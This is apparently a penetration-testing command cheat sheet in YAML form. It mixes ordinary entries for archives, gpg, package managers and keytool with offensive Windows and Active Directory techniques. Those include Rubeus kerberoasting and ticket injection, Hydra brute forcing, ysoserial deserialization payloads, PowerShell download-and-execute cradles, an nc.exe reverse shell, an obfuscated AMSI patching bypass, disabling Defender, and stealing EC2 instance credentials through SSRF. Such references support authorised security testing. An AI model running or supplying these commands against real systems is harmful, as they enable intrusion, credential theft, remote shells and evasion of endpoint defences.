- - cmd: rpcclient <ip> -U "<user>%<password>" -c "srvinfo; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - srvinfo
- - cmd: rpcclient <ip> -c "lookupnales <name>; wmic useraccount get name,sid; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - get user sid
- - cmd: rpcclient <ip> -U "<user>%<password>" -c "querydominfo; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - querydominfo
- - cmd: rpcclient <ip> -U "<user>%<password>" -c "getdompwinfo; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - getdompwinfo (password policy)
- - cmd: rpcclient <ip> -U "<user>%<password>" -c "netshareenum; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - netshareenum (password policy)
- - cmd: 'for u in `cat <file>`; do echo -n "user: $u " && rpcclient -U "$u%$u" -c "getusername; quit" <ip>; done'
- lang: sh
- tags: rpcclient, rpc, windows
- desc: Trying all username as password from list of users
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "enum; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - enum (Enum commands list)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomains; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - enumdomains (Current domain)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomgroups; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - enumdomgroups (Enum Domain groups)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroup <RID>; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - querygroup (Enum Group Information)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroupmem <RID>; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - querygroupmem (Enum Group Membership)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "queryuser <RID>; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - queryuser (Enumerate specific User/ computer information by RID)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "getusrdompwinfo <RID>; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - getusrdompwinfo (User password policies)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "lsaenumsid; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - lsaenumsid (Local Users LSA Enum SID)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "lookupsid <SID>; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - lookupsid (Local Users Lookup SID)
- - cmd: rpcclient <ip> -U "<user>%<pass>" -c "setuserinfo2 <LOGIN> 23 '<NEWPASSWORD>'; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - setuserinfo2 (Reset AD user password)
- - cmd: '.\Rubeus.exe ptt /ticket:<ticket>'
- lang: ps1
- tags: pentest
- desc: ticket from file
- - cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<lhost>/Rubeus.exe'); $assem = [System.Reflection.Assembly]::Load($data);
- lang: ps1
- tags: ad, windows, rubeus
- desc: load rubeus from powershell
- - cmd: '[Rubeus.Program]::MainString("klist");'
- lang: ps1
- tags: ad, windows, rubeus
- desc: execute rubeus from powershell
- - cmd: '.\Rubeus.exe monitor /interval:5 /filteruser:<machine_account>'
- lang: ps1
- tags: ad, windows, rubeus
- desc: monitor
- - cmd: '.\Rubeus.exe ptt /ticket:<BASE64BLOBHERE>; .\Rubeus.exe asreproast /format:<AS_REP_response_format> /outfile:<output_hashes_file>'
- lang: ps1
- tags: ad, windows, rubeus
- desc: inject ticket from b64 blob
- - cmd: '.\Rubeus.exe asreproast /user:<user> /domain:<domain_name> /format:<AS_REP_response_format> /outfile:<output_hashes_file>; .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>'
- lang: ps1
- tags: ad, windows, rubeus
- desc: ASREPRoast specific user
- - cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name>'
- lang: ps1
- tags: ad, windows, rubeus
- desc: Kerberoasting and outputting on a file with a specific format
- - cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /rc4opsec'
- lang: ps1
- tags: ad, windows, rubeus
- desc: Kerberoasting while being "OPSEC" safe, essentially while not try to roast AES enabled accounts
- - cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /aes'
- lang: ps1
- tags: ad, windows, rubeus
- desc: Kerberoast AES enabled accounts
- - cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /user:<user> /simple'
- lang: ps1
- tags: ad, windows, rubeus
- desc: Kerberoast specific user account
- - cmd: '.\Rubeus.exe hash /user:<user> /domain:<domain_name> /password:<password>'
- lang: ps1
- tags: ad, windows, rubeus
- desc: get hash
- - cmd: .\Rubeus.exe dump
- lang: sh
- tags: ad, windows, rubeus
- desc: dump - will dump any relevant cached TGS ticket’s stored
- - cmd: '.\Rubeus.exe asktgt /user:<user> /domain:<domain_name> /rc4:<ntlm_hash> /ptt'
- lang: sh
- tags: ad, windows, rubeus
- desc: ask and inject ticket
- - cmd: '.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<user> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /ptt'
- lang: sh
- tags: ad, windows, rubeus
- desc: S4U - with ticket - Constrained delegation
- - cmd: '.\Rubeus.exe s4u /user:<user> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<user_to_impersonate> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /domain:<domain_name> /ptt'
- lang: sh
- tags: ad, windows, rubeus
- desc: S4U - with hash - Constrained delegation
- - cmd: '.\Rubeus.exe hash /password:<machine_password>'
- lang: sh
- tags: ad, windows, rubeus
- desc: get rc4 of machine with the password
- - cmd: '.\Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:<user_to_impersonate> /msdsspn:cifs/<domain_fqdn> /domain:<domain_name> /ptt'
- lang: sh
- tags: ad, windows, rubeus
- desc: S4U - Resource based constrained delegation
- - cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe') ; $assem = [System.Reflection.Assembly]::Load($data); [Rubeus.Program]::Main("<rubeus_cmd>".Split())
- lang: ps1
- tags: ad, windows, rubeus
- desc: Rubeus Reflection assembly
- - cmd: 7z a <archive_name>.7z -p<password> <file>
- lang: sh
- tags: archive
- desc: 7z create archive with password
- - cmd: binwalk -Me <firmware_file>
- lang: sh
- tags: archive
- desc: Recursively extract files from a firmware
- - cmd: binwalk -E <firmware_file>
- lang: sh
- tags: archive
- desc: Compute entropy of a firmware
- - cmd: gzip <path>
- lang: sh
- tags: archive
- desc: Compress file and appends .gz to its name
- - cmd: gzip -d <gz_file>
- lang: sh
- tags: archive
- desc: Decompress compressed file
- - cmd: rar a <dir>
- lang: sh
- tags: pentest
- desc: Compress dir to rar file
- - cmd: unrar x <file>.rar
- lang: sh
- tags: pentest
- desc: Decompress rar file
- - cmd: tar cf <name>.tar <files>
- lang: sh
- tags: archive
- desc: Create a tar containing files
- - cmd: tar xf <tar_file>
- lang: sh
- tags: archive
- desc: Extract the files from a tar
- - cmd: tar czf <name>.tar.gz <files>
- lang: sh
- tags: archive
- desc: Create a tar with Gzip compression
- - cmd: tar xzf <targz_file>
- lang: sh
- tags: archive
- desc: Extract a tar using Gzip
- - cmd: unblob <firmware_file>
- lang: sh
- tags: archive
- desc: Extract files from a firmware
- - cmd: unblob --show-external-dependencies
- lang: sh
- tags: archive
- desc: Show external dependencies
- - cmd: zip <file>.zip <files_to_zip>
- lang: sh
- tags: archive, compress
- desc: create zip file
- - cmd: zip <file>.zip *
- lang: sh
- tags: archive, compress
- desc: zip all the files of current directory
- - cmd: zip -r <file>.zip <folder>
- lang: sh
- tags: archive, compress
- desc: zip folder
- - cmd: zip -u <file>.zip <file_to_add>
- lang: sh
- tags: archive, compress
- desc: add file to a zip archive
- - cmd: zipinfo <file>.zip
- lang: sh
- tags: archive, compress
- desc: view zip content
- - cmd: zip --symlinks <file>.zip <symlink_file>
- lang: sh
- tags: archive, compress
- desc: create zip file with symlink (useful for path traversal)
- - cmd: unzip -Z <file>.zip
- lang: sh
- tags: archive, compress
- desc: list detailed zip file content
- - cmd: unzip <file>.zip
- lang: sh
- tags: archive, compress
- desc: unzip file
- - cmd: unzip <file>.zip -d <destination_folder>
- lang: sh
- tags: archive, compress
- desc: unzip file to directory
- - cmd: hydra -L <userlist> -P <passlist> <ip> ssh
- lang: bash
- tags: bruteforce, access
- desc: Hydra - ssh - userlist and password list - 22
- - cmd: hydra -l <user|root> -p <password|root> <ip> ssh
- lang: bash
- tags: bruteforce, access
- desc: Hydra - ssh - user and password - 22
- - cmd: hydra -L <userlist> -e s <ip> ssh
- lang: sh
- tags: bruteforce, access
- desc: Hydra - ssh - user=password - 22
- - cmd: hydra -l <user|root> -e n <ip> ssh
- lang: sh
- tags: bruteforce, access
- desc: Hydra - ssh - null password - 22
- - cmd: hydra -L <userlist> -e r <ip> ssh
- lang: sh
- tags: bruteforce, access
- desc: Hydra - ssh - password=reverseuser - 22
- - cmd: hydra -t 4 -s <port> -C <file_login_pass> <ip> ssh
- lang: sh
- tags: bruteforce, access
- desc: Hydra - ssh - file "login:pass" format - specify port
- - cmd: hydra -L <userlist> -P <passlist> <ip> ftp
- lang: sh
- tags: bruteforce, access
- desc: Hydra - ftp - 21
- - cmd: hydra -L <userlist> -P <passlist> <ip> smb
- lang: sh
- tags: bruteforce, access
- desc: Hydra - smb - 445
- - cmd: hydra -L <userlist> -P <passlist> <ip> mysql
- lang: sh
- tags: bruteforce, access
- desc: Hydra - mysql - 3306
- - cmd: hydra -L <userlist> -P <passlist> <ip> vnc
- lang: sh
- tags: bruteforce, access
- desc: Hydra - vnc - 5900
- - cmd: hydra -L <userlist> -P <passlist> <ip> postgres
- lang: sh
- tags: bruteforce, access
- desc: Hydra - postgres - 5432
- - cmd: hydra -L <userlist> -P <passlist> <ip> telnet
- lang: sh
- tags: bruteforce, access
- desc: Hydra - telnet - 23
- - cmd: cewl -w <file|wordlist.txt> -d <deep|3> -m <min_word_size|5> <url>
- lang: bash
- tags: wordlist, bruteforce, dict
- desc: cewl - wordlist creation
- - cmd: crunch <min|2> <max|8> 0123456789ABCDEF -o <output.txt>
- lang: bash
- tags: wordlist, bruteforce, dict
- desc: crunch - generate wordlist hex
- - cmd: crunch <min> <max> -f /usr/share/crunch/charset.lst <charset|mixalpha-numeric> -o <output.txt>
- lang: bash
- tags: wordlist, bruteforce, dict
- desc: crunch - generate wordlist charset
- - cmd: crunch 8 8 -t <pattern|,@@@%%%^> -o <output.txt>
- lang: bash
- tags: wordlist, bruteforce, dict
- desc: crunch - generate wordlist Upper(,) lower(@)x3 numeric(%)x3 special(^)x1
- - cmd: crunch 8 8 -t password%%^ -o <output.txt>
- lang: bash
- tags: wordlist, bruteforce, dict
- desc: crunch - generate wordlist contain "password", 2 numbers and 1 special char
- - cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
- lang: sh
- tags: aws
- desc: SSRF in EC2 - List roles
- - cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
- lang: sh
- tags: aws
- desc: SSRF in EC2 - Dump roles
- - cmd: gpg --version
- lang: sh
- tags: gpg
- desc: gpg version
- - cmd: gpg --gen-key
- lang: sh
- tags: gpg
- desc: gpg generate key
- - cmd: gpg --list-keys
- lang: sh
- tags: gpg
- desc: list keys
- - cmd: gpg --keyserver <key_server> --send-keys <public_key>
- lang: sh
- tags: gpg
- desc: distribute public key to key server
- - cmd: gpg --output <filename_gpg> --export <key_name>
- lang: sh
- tags: gpg
- desc: export public key
- - cmd: gpg --import <filename_gpg>
- lang: sh
- tags: gpg
- desc: import public key
- - cmd: gpg --output <output_filename_gpg> --encrypt --recipient <public_key> <input_filename>
- lang: sh
- tags: gpg
- desc: encrypt document
- - cmd: gpg --output <filename> --decrypt <filename_gpg>
- lang: sh
- tags: gpg
- desc: decrypt document
- - cmd: gpg --output <filename_sig> --sign <filename>
- lang: sh
- tags: gpg
- desc: make a signature
- - cmd: gpg --output <filename> <filename> --decrypt <filename_sig>
- lang: sh
- tags: gpg
- desc: verify signature
- - cmd: gpg --clearsign <filename>
- lang: sh
- tags: gpg
- desc: clearsign documents
- - cmd: gpg --output <filename_sig> --detach-sig <filename>
- lang: sh
- tags: gpg
- desc: detach signature
- - cmd: redis-cli
- lang: bash
- tags: databases
- desc: connect to the local server
- - cmd: redis-cli -h <ip> -a <password>
- lang: bash
- tags: databases
- desc: connect to a remote server on the default port (6379)
- - cmd: redis-cli -h <ip> -p <port> -a <password>
- lang: bash
- tags: databases
- desc: connect remotely specifying a port
- - cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem>
- lang: bash
- tags: databases
- desc: connect remotely over tls w/ server certificate
- - cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem> --cert <redis_user_path.crt> --key <redis_user_private_path.key>
- lang: bash
- tags: databases
- desc: connect remotely over tls w/ server & client certificates
- - cmd: java -jar ysoserial.jar <lib_payload> 'powershell.exe -EncodedCommand <base64_encoded_command>' > <output_file>
- lang: bash
- tags: java, unserialize
- desc: ysoserial java - generate payload
- - cmd: iconv -f ASCII -t UTF-16LE <file_to_convert> | base64 | tr -d "\n"
- lang: bash
- tags: java, unserialize
- desc: convert file to base64 one line
- - cmd: ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -EncodedCommand <base64_encoded_command>" --path="<asp_file_webroot_relative_path>" --apppath="<application_path_webroot_relative>" --decryptionalg="3DES" --decryptionkey="<decryption_key>" --validationalg="SHA1" --validationkey="<validation_state>"
- lang: ps1
- tags: .net, unserialize
- desc: ysoserial.net - generate payload VIEWSTATE
- - cmd: ysoserial.exe -f <lib|Json.Net> -g <gadget|ObjectDataProvider> -o raw -c "<command|calc.exe>" -t
- lang: ps1
- tags: .net, unserialize
- desc: ysoserial.net - calc.exe payload for Json.Net using ObjectDataProvider gadget.
- - cmd: bitsadmin /Transfer myJob http://<ip>/<file|file.txt> <path|C:\windows\temp>
- lang: sh
- tags: pentest
- desc: file with bitsadmin
- - cmd: certutil.exe -urlcache -split -f http://<server>/<source_file> <dest_file>
- lang: sh
- tags: windows, certutil
- desc: download with certutil
- - cmd: certutil.exe -verifyctl -f -split h http://<server>/<source_file> <dest_file>
- lang: sh
- tags: windows, certutil
- desc: download with certutil (2)
- - cmd: certutil -decode enc.txt <file>
- lang: sh
- tags: windows, certutil
- desc: Encode in base64 with certutil
- - cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http://<server>/<source_file>','<dest_file>')"
- lang: ps1
- tags: powershell, download
- desc: Download with powershell
- - cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile New-Object System.Net.WebClient.DownloadFile('<url_file>','nc.exe'); nc.exe <ip> <port> -e cmd.exe
- lang: ps1
- tags: powershell, download
- desc: Download and execute with powershell
- - cmd: (new-object system.net.webclient).downloadstring('http://<ip>/<script>') | IEX
- lang: ps1
- tags: powershell, download
- desc: Download cradle
- - cmd: Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
- lang: ps1
- tags: powershell, download
- desc: Get file in trash
- - cmd: Get-Process
- lang: ps1
- tags: powershell, download
- desc: Get process
- - cmd: '[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://<ip>/<url>")'
- lang: ps1
- tags: powershell, download
- desc: Get Proxy
- - cmd: $ExecutionContext.SessionState.LanguageMode
- lang: ps1
- tags: powershell, download
- desc: Get language mode
- - cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}; $g=$f.GetValue($null); [IntPtr]$ptr=$g; [Int32[]]$buf = @(0); [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
- lang: ps1
- tags: powershell, download
- desc: Bypass AMSI with _amsiContext_ (powershell only)
- - cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*InitFailed") {$f=$e}}; $f.SetValue($null,$true)
- lang: ps1
- tags: powershell, download
- desc: Bypass AMSI with _AmsiInitFailed_ (powershell only)
- - cmd: $ZQCUW = @"; using System; ; using System.Runtime.InteropServices; ; public class ZQCUW {; [DllImport("kernel32")]; public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); ; [DllImport("kernel32")]; public static extern IntPtr LoadLibrary(string name); ; [DllImport("kernel32")]; public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); ; }; "@; Add-Type $ZQCUW; $BBWHVWQ = [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97; &#109; &#115; &#105; &#46; &#100; &#108; &#108; '))"); $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('&#65; &#109; &#115; &#105; &#83; &#99; &#97; &#110; &#66; &#117; &#102; &#102; &#101; &#114; '))"); $p = 0; [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p); $TLML = "0xB8"; $PURX = "0x57"; $YNWL = "0x00"; $RTGX = "0x07"; $XVON = "0x80"; $WRUD = "0xC3"; $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
- lang: ps1
- tags: powershell, download
- desc: Bypass AMSI by patching (work for .NET binaries too)
- - cmd: Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
- lang: ps1
- tags: powershell, download
- desc: Verify PPL
- - cmd: Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
- lang: ps1
- tags: powershell, download
- desc: Verify application whitelisting
- - cmd: ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
- lang: ps1
- tags: powershell, download
- desc: show forest trust
- - cmd: Get-DomainTrust -Domain <domain>
- lang: ps1
- tags: powershell, download
- desc: Get domain trust
- - cmd: Get-DomainSID -domain <sid>
- lang: ps1
- tags: powershell, download
- desc: Get domain SID
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/HostRecon.ps1') | IEX; Invoke-HostRecon
- lang: sh
- tags: powershell, download
- desc: hostrecon
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/PrivescCheck.ps1') | IEX; Invoke-PrivescCheck
- lang: ps1
- tags: powershell, download
- desc: privesccheck
- - cmd: '[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname'
- lang: ps1
- tags: powershell, download
- desc: powershell view assemblies
- - cmd: $proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
- lang: ps1
- tags: powershell, download
- desc: powershell get proxy address
- - cmd: '[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://<proxaddress|$proxyAddr>")'
- lang: ps1
- tags: powershell, download
- desc: powershell set proxy
- - cmd: pwsh -Command '$text = "(New-Object System.Net.WebClient).DownloadString(''http://<lhost>/<file>'') | IEX"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($text); $EncodedText = [Convert]::ToBase64String($bytes); $EncodedText'
- lang: ps1
- tags: powershell, download
- desc: powershell - generate base64 encoded payload download runner
- - cmd: Set-MpPreference -DisableRealtimeMonitoring $true
- lang: ps1
- tags: powershell, download
- desc: powershell - disable Real Time Monitoring (Windows Defender)
- - cmd: python -m SimpleHTTPServer <lport>
- lang: bash
- tags: server
- desc: python Simple HTTP server
- - cmd: python3 -m http.server <lport>
- lang: bash
- tags: server
- desc: python3 Simple HTTP server
- - cmd: php -S 0.0.0.0:<lport>
- lang: sh
- tags: server
- desc: php Simple builtin server
- - cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file>
- lang: sh
- tags: pentest
- desc: Read from linux (e.g. Raspberry Pi)
- - cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
- lang: sh
- tags: pentest
- desc: Force read from linux (e.g. Raspberry Pi)
- - cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file>
- lang: sh
- tags: pentest
- desc: Read from BusPirate
- - cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
- lang: sh
- tags: pentest
- desc: Force read from BusPirate
- - cmd: brew update
- lang: sh
- tags: mac, install
- desc: update brew
- - cmd: brew upgrade
- lang: sh
- tags: mac, install
- desc: upgrade brew
- - cmd: brew info <package>
- lang: sh
- tags: mac, install
- desc: get info for a package
- - cmd: brew cask info <casks>
- lang: sh
- tags: mac, install
- desc: get info for a cask
- - cmd: brew install <package>
- lang: sh
- tags: mac, install
- desc: install a package
- - cmd: brew cask install <casks>
- lang: sh
- tags: mac, install
- desc: install a cask
- - cmd: brew uninstall <installed>
- lang: sh
- tags: mac, install
- desc: uninstall a package
- - cmd: brew cask uninstall <caskinstalled>
- lang: sh
- tags: mac, install
- desc: uninstall a cask
- - cmd: brew edit <package>
- lang: sh
- tags: mac, install
- desc: edit package
- - cmd: brew cask edit <casks>
- lang: sh
- tags: mac, install
- desc: edit cask
- - cmd: yum list available
- lang: sh
- tags: yum
- desc: List all available packages
- - cmd: yum list installed
- lang: sh
- tags: yum
- desc: List all installed packages
- - cmd: yum info <package-name>
- lang: sh
- tags: yum
- desc: Info about package
- - cmd: yum search <query>
- lang: sh
- tags: yum
- desc: Search in repository (packages and descriptions)
- - cmd: yum history list
- lang: sh
- tags: yum
- desc: List all history actions (install, update and erase)
- - cmd: yum check-update
- lang: sh
- tags: yum
- desc: Check updates for installed packages
- - cmd: yum update
- lang: sh
- tags: yum
- desc: Update all packages
- - cmd: yum update <package-name>
- lang: sh
- tags: yum
- desc: Update specific/individual package
- - cmd: yum downgrade <package-name>
- lang: sh
- tags: yum
- desc: Downgrade package
- - cmd: yum install <package-name>
- lang: sh
- tags: yum
- desc: Install a package from repository
- - cmd: yum remove <package-name>
- lang: sh
- tags: yum
- desc: Remove/delete package
- - cmd: yum localinstall <filepath-rpm>
- lang: sh
- tags: yum
- desc: Install local rpm package
- - cmd: yum update --security
- lang: sh
- tags: yum
- desc: Install security updates
- - cmd: yum deplist <package-name>
- lang: sh
- tags: yum
- desc: List dependencies of package
- - cmd: yum autoremove
- lang: sh
- tags: yum
- desc: Remove un-needed packages and dependencies
- - cmd: yum whatprovides <query>
- lang: sh
- tags: yum
- desc: Whatprovides package/file/binary
- - cmd: yum repolist
- lang: sh
- tags: yum
- desc: List currently enabled repositories
- - cmd: keytool -genkey -alias <ALIAS> -keyalg RSA -keystore <OUTPUT_JKS> -keysize <RSA_LENGTH>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Generate a Java keystore and key pair
- - cmd: keytool -certreq -alias <ALIAS> -keystore <INPUT_JKS> -file <OUTPUT_CSR>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Generate a certificate signing request (CSR) for an existing Java keystore
- - cmd: keytool -import -trustcacerts -alias root -file <INPUT_CRT> -keystore <INPUT_JKS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Import a root or intermediate CA certificate to an existing Java keystore
- - cmd: keytool -import -trustcacerts -alias <ALIAS> -file <INPUT_CRT> -keystore <INPUT_JKS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Import a signed primary certificate to an existing Java keystore
- - cmd: keytool -genkey -keyalg RSA -alias <ALIAS> -keystore <OUTPUT_JKS> -storepass <PASSWORD> -validity <VALIDITY> -keysize <RSA_LENGTH>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Generate a keystore and self-signed certificate
- - cmd: keytool -printcert -v -file <INPUT_CRT>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Check a stand-alone certificate
- - cmd: keytool -list -v -keystore <INPUT_JKS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Check which certificates are in a Java keystore
- - cmd: keytool -list -v -keystore <INPUT_JKS> -alias <ALIAS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Check a particular keystore entry using an alias
- - cmd: keytool -delete -alias <ALIAS> -keystore <INPUT_JKS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Remove a certificate from a keystore
- - cmd: keytool -storepasswd -keystore <INPUT_JKS> -new <NEW_PASSWORD>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Change the password of a keystore
- - cmd: keytool -export -alias <ALIAS> -file <OUTPUT_CRT> -keystore <INPUT_JKS>
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Export a certificate from a keystore
- - cmd: keytool -list -v -keystore $JAVA_HOME/jre/lib/security/cacerts
- lang: sh
- tags: java keytool, certificate, encryption
- desc: List the trusted CA Certs from the default Java Trusted Certs Keystore
- - cmd: keytool -import -trustcacerts -file <INPUT_PEM> -alias <ALIAS> -keystore $JAVA_HOME/jre/lib/security/cacerts
- lang: sh
- tags: java keytool, certificate, encryption
- desc: Import New Certificate Authority into the default Java Trusted Certs Keystore
- - cmd: echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0; }' > pwn.c; ; gcc pwn.c -o <filename|shell>; ; rm pwn.c
- lang: bash
- tags: c, shell
- desc: generate shell bash bin
- - cmd: DotNetToJScript.exe <dll|ExampleAssembly.dll> --lang=Jscript --ver=v4 -o <jscript|runner.js>
- lang: sh
- tags: pentest
- desc: DotNetToJScript
- - cmd: npm init
- lang: sh
- tags: npm, node, js
- desc: initial new package
- - cmd: npm init -y
- lang: sh
- tags: npm, node, js
- desc: initial immediately a new package
- - cmd: npm install
- lang: sh
- tags: npm, node, js
- desc: install all dependencies packages
- - cmd: npm install --save-dev
- lang: sh
- tags: npm, node, js
- desc: install all dev dependencies packages
- - cmd: npm install <package_name>
- lang: sh
- tags: npm, node, js
- desc: install a specified package
- - cmd: npm install <package_name> --save-dev
- lang: sh
- tags: npm, node, js
- desc: install a specified dev package
- - cmd: npm install <package_name> -g
- lang: sh
- tags: npm, node, js
- desc: install globally a specified package
- - cmd: nvm install <version>
- lang: sh
- tags: nvm, node, js
- desc: install a specified version of node
- - cmd: nvm ls-remote
- lang: sh
- tags: nvm, node, js
- desc: list available versions
- - cmd: nvm use <version>
- lang: sh
- tags: nvm, node, js
- desc: use installed node's version
- - cmd: nvm alias default <version>
- lang: sh
- tags: nvm, node, js
- desc: set a node's version as default
- - cmd: grep -rn --include "*.js" -e "^\(.*\s\|.*child_process.*|\)\(exec\|spawn\|eval\|execSync\|spawnSync\|execFileSync\)(" --color
- lang: sh
- tags: whitebox, nodejs
- desc: command execution
- - cmd: grep -rn --include "*.js" -e "^\(.*\s\|\)\(require\)(" --color; grep -rn --include "*.js" -e "^\(.*\s\|\)\(appendFile\|open\|readFile\|WriteFile\\|unlink\|rename\|formidable)(" --color; grep -rn --include "*.js" -e "unserialize(" --color
- lang: sh
- tags: whitebox, nodejs
- desc: require
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(include\|require\|virtual\|require_once\|include_once\)\(\s\|(\).*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep include
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(readfile\|file_get_contents\|stream_get_contents\|show_source\|fopen\|file\|fpassthru\|gzopen\|gzfile\|gzpassthru\|readgzfile\)\(\s\|(\).*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep path traversal
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(eval\|popen\|pcntl_exec\|assert\|proc_open\|create_function\|call_user_func\|call_user_func_array\|exec\|shell_exec\|system\|passthru\|virtual\)([^)]*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep exec
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(preg_replace\|ereg_replace\|eregi_replace\|mb_ereg_replace\|mb_eregi_replace\)(.*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep replace
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)unserialize(.*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep unserialize
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)ldap_search(.*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep ldap
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)xpath.*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep xpath
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep mail
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color
- lang: sh
- tags: php, whitebox
- desc: php grep echo
- - cmd: grep -rn --include "*.php" -e "\(\\\$[^=]\|0\)\s*==\s*\(0\|\\\$[^=]\\)" --color
- lang: sh
- tags: php, whitebox
- desc: php grep weak comparison
